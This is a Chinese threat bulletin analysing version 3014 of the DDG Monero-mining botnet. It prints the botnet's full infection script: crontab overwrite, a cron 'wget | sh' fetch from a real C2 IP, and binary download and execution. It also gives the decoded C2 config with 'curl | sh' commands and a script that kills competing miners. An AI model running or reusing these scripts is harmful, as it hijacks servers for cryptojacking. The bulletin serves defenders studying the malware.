威胁快讯:DDG 3014 版本

DDG 是一个专注于扫描控制 SSH 、 Redis数据库 和 OrientDB数据库 服务器,并攫取服务器算力挖矿(门罗币)的僵尸网络。我们在2017年10月25日首次感知到 DDG僵尸网络,并在随后发布了报告报告。最近的一篇 报告 发布于 2018-08,当时 DDG 的版本更新到 3013。

近期,我们注意到 DDG 更新到版本 3014。

1. 基本信息

sample 全家福:

v3014 目录下的 sample:

新出现的 sample 详情:

hxxp://149.56.106.215:8000/static/3014/ddgs.i686    md5=dcecbe02489d15ea34b7b13aa6d40639  
hxxp://149.56.106.215:8000/static/3014/ddgs.x86_64    md5= ad0dd11e74f118977c6c109f4d5f8b0a  
hxxp://149.56.106.215:8000/static/qW3xT.3    45106124496d4492197bbb16c18652c6  
hxxp://149.56.106.215:8000/static/qW3xT.4    9dd8c5b1dc74286d81bc78372d9b7f27  

i.sh(v3014)

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root

echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs  
echo "" > /var/spool/cron/crontabs/root

echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3014 || rm -rf /tmp/ddgs.3014  
if [ ! -f "/tmp/ddgs.3014" ]; then  
    wget -q http://149.56.106.215:8000/static/3014/ddgs.$(uname -m) -O /tmp/ddgs.3014

fi  
chmod +x /tmp/ddgs.3014 && /tmp/ddgs.3014

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill  
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

2. 新feature

2.1 主样本自身:

相比 v3013,ddg 主样本由 Go.1.10.3 编译,功能几乎没变化,只是中内置的 iplist 只新增下面 1 个IP:

47.95.200.188 China/CN    "AS37963 Hangzhou Alibaba Advertising Co.,Ltd."  

2.2 矿机

新增的两个矿机样本,qW3xT.3qW3xT.4 ,有下面 2 处变化:

  1. 由较新版本的 XMRig 2.8.1 编译;

  2. qW3xT.4新增一个矿机代理:
    59.2.77.151 Republic of Korea/KR "AS4766 Korea Telecom"

Wallet 没变化,仍然是:

42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2aPmAAVpHcPM8yoDEYD9Fy7eRvPJhR7SKFyTaFbSYCNZ2t3ik

最新数据为:

Connected Pool: nanopool

Paid: 24.1394850336

2.3 云端配置文件

跟 v3013 的机制相同,ddg 主样本会遍历 iplist 中的每个 ip:8000,一旦连接成功,就会发送以下请求:

C2 收到上面的请求,就会返回一段经过 MsgPack 序列化编码过的自定义格式配置数据,云端配置文件相比 v3013 有一些改动,解码后整理大致如下:

{Data: 
    Config:
    Interval: "360s";
    Miner: [{
        Exe: "/tmp/qW3xT.4",
        Md5: 9dd8c5b1dc74286d81bc78372d9b7f27,
        Url: "/static/qW3xT.4"
    }], 
    Cmd:[
        AAredis:{
            Id: 6093,
            Version: 3021,
            ShellUrl: "http://149.56.106.215:8000/i.sh"
            NThreads: 204,
            Duration: "240h”,
            IPDuration: "26h",
            GenLan,
            GenAAA,
            Timeout: "21m",
            Ports: (5379, 6379, 7379)
        },
        AAssh:{
            Id: 2253,
            Version: 3021,
            ShellUrl: "http://149.56.106.215:8000/i.sh", 
            Duration: "240h”,
            IPDuration: "312h",
            GenLan,
            GenAAA,
            Timeout: "21m",
            Ports: (22, 2222)
        },
        Sh:[
            {
                Id: 398,
                Version: 255,
                Timeout "120s",
                Line: "curl -fsSL http://149.56.106.215:8000/static/disable.sh | sh"
            },{
                Id: 461,
                Version: 3013,
                Line: "curl -fsSL http://149.56.106.215:8000/i.sh | sh",
                Timeout: "120s",
                Killer: 132
            },{
                Id: 388,
                Version: 3014,
                Expr: "/tmp/ddgs.3013"
                Timeout: "360s"
            },{
                Id: 389,
                Version: 3014,
                Expr: ".+(cryptonight|stratum+tcp://|dwarfpool.com|supportxmr.com).+",
                Timeout: "360s"
            },{
                Id: 390,
                Version: 3014,
                Expr: "./xmr-stak|./.syslog|/bin/wipefs|./xmrig|/tmp/wnTKYg",
                Timeout: "360s"
            },{
                Id: 381,
                Version: 255,
                Expr: "/tmp/2t3ik.+"
            },{
                Id: 397,
                Version: 255,
                Expr: "/tmp/qW3xT.+",
                Timeout: "360s"
            }
        ]
    ],
    Signature: 
        'B|\x88Q\xe1"E\x12;\x8f\xf0$\n\xca\xce\x8da\x89\xfcW\x1d\x9dm\x10\x01\xf9\x84H\x19\x03\xc70e\xa2[\x04\xd1G\xba\xabQ;\x9d\xc7\x01C\x17k\xad\x9a-\x9c\xae\x82\xd2\xb8\x80\x81}\xdd\xb9@\xf1\x7fE\xd6\xed\xab\xe9\x08\xb2-\x8c\xad\xfd\xe9 "R\xdd\x91Y\xffgf\xaf\xb6y0\x8c$\x18\xad\xb8\xcb\xe89.\x01\x16\xfb\xf0\x93\xfaBA>]h+F\xe4\xd9\x9c\xc1\x1cOI\xd7\x16P%\xec~\xee\xeb`\x8d\xbe\xf7\x07\x1dM\x85\x88\x8eT\xcc\xb8 x`\n\xc2\xf7X\xc1E\x8e)\x1c\x16n\xebw\x13\xef=;\x1f_Y7Zof(/\x19#\xf1\xbb\xb9s\x86;\x11zlC\xcbh\xfa\xb0\xca\xd6%\nQ\x948L\x8c_\xc8\xb5O6(Y\x99\xa2\xfb\x04\xef\xf2\xbe\x11\xc7w\xc7\x87\x0e\xc2\xe3\xbca)|\xea0 "\x8b\x96q\x14q\xe68\xb7\x1eo\x16\x02\xd4\xba\xfc\\\x8a\x95\x18\xb1\xc9>p=\xb0\xf6\xf6N\xa5\x87;\xde\xf4\xb4\x83'
    }

尤其值得注意的是,第二阶段的配置文件中新增了一个 Shell 脚本:

http://149.56.106.215:8000/static/disable.sh  

内容如下:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port  
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty  
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty  
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty

ps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep /usr/bin/bsd-port/getty | awk '{print $2}' | xargs kill  

可见作者把一部分 杀掉其他同类恶意进程 的工作单独放到这个脚本中,其中

  • yilu 相关的进程,属于这个平台的挖矿进程:http://www.yiluzhuanqian.com/
  • getty 为知名恶意家族 BillGates 的进程。